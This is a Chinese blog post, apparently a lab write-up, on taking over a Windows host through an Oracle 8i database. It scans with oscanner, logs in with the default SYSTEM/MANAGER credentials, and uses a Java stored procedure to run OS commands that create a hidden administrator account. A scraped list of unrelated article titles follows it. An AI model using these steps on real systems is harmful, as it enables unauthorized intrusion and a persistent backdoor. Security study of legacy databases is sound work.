从oracle 8i数据库渗透整个系统

最近一直在搞这个oracle 8i数据库的渗透测试,也算是成功复现了oracle8.1.7数据库的完整渗透过程。本文章仅供学习研究,如从事任何违法违规的事,一切后果自行承担。

环境

oracle8.1.7+xp系统(2003系统也一样)
oracle数据库是安装好的(服务器模式),默认的用户名密码都没有进行修改。ip:192.168.56.9

步骤一 扫描探测

使用oscanner进行探测,本人使用的是kali安装并使用的.
安装命令:

apt-get install oscanner

运行命令:

oscanner -s 192.168.56.9 -P 1521

扫描的结果如下:


扫描发现:存在很多默认账户,而且很多账户的权限都是DBA。

步骤二 进行渗透测试

(一)使用sqlplus远程连接oracle数据库:(sqlplus的配置:需要在官网上下载instantclient-basic和配套的sqlplus,我下载的是instantclient-basic-win32-10.1.0.5-20060419,亲测可用)

sqlplus.exe SYSTEM/MANAGER@192.168.56.9:1521/ora8


这就表示已经成功的远程登录到数据库了。其实这已经构成了数据库的安全问题,如果你精通oracle数据库的命令,你就可以对数据库进行任意更改,甚至可以删库跑路。

(二)还想进一步的渗透到装有oracle数据库的主机系统,怎么办?
这就需要借助sql语句执行java命令,从而实现执行系统命令。
1.新建 java.sql(java.sql 在我的资源里可以自行下载)
2.执行java.sql

3.执行系统命令,如新建用户并把用户列入超级管理员。

exec javacmdproc('cmd.exe /c net user xiaozi 123 /add');
exec javacmdproc('cmd.exe /c net localgroup administrators xiaozi /add');

4.我们查看xp主机是否出现xiaozi的账户

出现了xiaozi的账户,说明我们执行sql语句可以实现执行系统命令。

本篇文章就到这里,有不足的地方请多指教

从oracle 8i数据库渗透整个系统(可以直接上手)相关推荐

  1. 优化调整Oracle 8i数据库

    Oracle 8i数据库服务器是高度可优化的软件产品,经常性的调整可以优化系统的性能,防止出现数据瓶颈.我们通过调整数据库系统,可以使它达到最佳性能以满足用户的需要. 下面,笔者将介绍优化和调整Sun ...

  2. oracle 8i 数据库修复,优化调整Oracle 8i数据库

    导读: Oracle 8i数据库服务器是高度可优化的软件产品,经常性的调整可以优化系统的性能,防止出现数据瓶颈.我们通过调整数据库系统,可以使它达到最佳性能以满足用户的需要.下面,笔者将介绍优化和调整 ...

  3. oracle 8i漏洞渗透,一次通过Oracle8i入侵系统之旅(组图)

    最近看了些有关Oracle的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.先用SuperScan4.0扫描下要测试的主机,速度很快,结果如图1所示: 图 1 端口 1521 是 Or ...

  4. oracle 8i安装说明,Oracle 8i for NT/WIN2000安装与配置

    Oracle 8i for NT/WIN2000安装取配置 经过本章的教习您应该把握: l 服务器真个安装.服务的启动.卸载; l 客户端安装 l 客户真个衔接配置 l 国强财务硬件中帐套治理及情况配 ...

  5. Oracle新手笔记(2) 关于Oracle 9i或9i以上版本客户端连接Oracle 8i及8i版本以下服务器端中文字符乱码的解决办法...

    在做项目过程中,遇到Oracle 9i或9i版本以上客户端连接Oracle 8i及8i版本以下服务器端时,查询出来的中文数据全部变成了乱码.经查询资料终于解决了乱码问题. 开发工具是ASP.NET(C ...

  6. 大话oraclerac集群、高可用性、备份与恢复_数腾Oracle RAC数据库灾备解决方案

    "一个系统包含很多模块,数据库.前端.缓存.搜索.消息队列等,每个模块都需要做到高可用,才能保证整个系统的高可用." 数据库作为现代信息社会的基石,几乎所有的计算机应用软件都构建于 ...

  7. 循序渐进Oracle:数据库的字符集和字符集文件

    导读:本文来自『墨天轮』专栏"循序渐进Oralcle"(https://www.modb.pro/topic/6289,复制到浏览器中打开或者点击"阅读原文") ...

  8. oracle 传递table,将对象类型表从java传递到oracle 8i(Pass table of object type from java to oracle 8i)...

    将对象类型表从java传递到oracle 8i(Pass table of object type from java to oracle 8i) 我需要将一个对象列表(如值表)从java传递给ora ...

  9. oracle8 as sysdba,Oracle 8i 密码验证

    一. oracle 8i中仍然保留了internal用户, SQL> select * from v$pwfile_users; USERNAME                       S ...

最新文章

  1. 莫队算法(Mo's_Algorithm)
  2. python之闭包的实现
  3. 世界最厉害的14位程序员,你认识几个?
  4. 系统学习 Java IO (六)----管道流 PipedInputStream/PipedOutputStream
  5. 微信小程序的出现会给前端开发带来什么
  6. oracle linux hugepage,LInux下为什么配置HugePages及配置步骤
  7. 设计模式 (五) 原型模式
  8. Clouda安装和使用过程详解
  9. .pth.tar文件
  10. 深入理解 CSS(Cascading Style Sheets)中的层叠(Cascading)
  11. Hyman分别测试法
  12. 防屏蔽浏览器_国外lead/emu广告联盟平台/扫盲篇–UA,指纹浏览器与流量来路-VMLogin指纹浏览器介绍..
  13. 云产品学习之路(阿里云01)阿里云rds数据库导出
  14. golang版本管理gvm
  15. android实现音乐播放器(进度条)
  16. 深入浅出Yolo系列之Yolov3Yolov4核心基础知识完整讲解
  17. Matlab 将计算结果制作成 gif 动画
  18. 1.中心化账本缺点/哈希函数/什么是区块链
  19. MySQL设置utf8mb4编码
  20. Python爬虫新手入门教学(十八):爬取yy全站小视频

热门文章

  1. 学计算机去西电还是北交,这3所211大学,一点也不逊色于985,各有特色,毕业生同样受欢迎...
  2. Win10系统如何关闭右下角那个烦人的天气卡片
  3. android 三星拍照,据说卖断货?我替大伙试试三星S10的拍照功能好不好用
  4. 被动调Q耦合速率方程组数值Matlab仿真
  5. [准连续泵浦被动调Q激光器速率方程求解
  6. android 双卡打电话,Android 6.0 双卡拨号
  7. 斯坦福大学-自然语言处理入门 笔记 第十五课 词汇化(Lexicalization)的PCFGs
  8. 联想微型计算机重装,联想启天A815一体机重装win7系统?
  9. POE网络变压器应用通电线路
  10. opengl教程2,你好顶点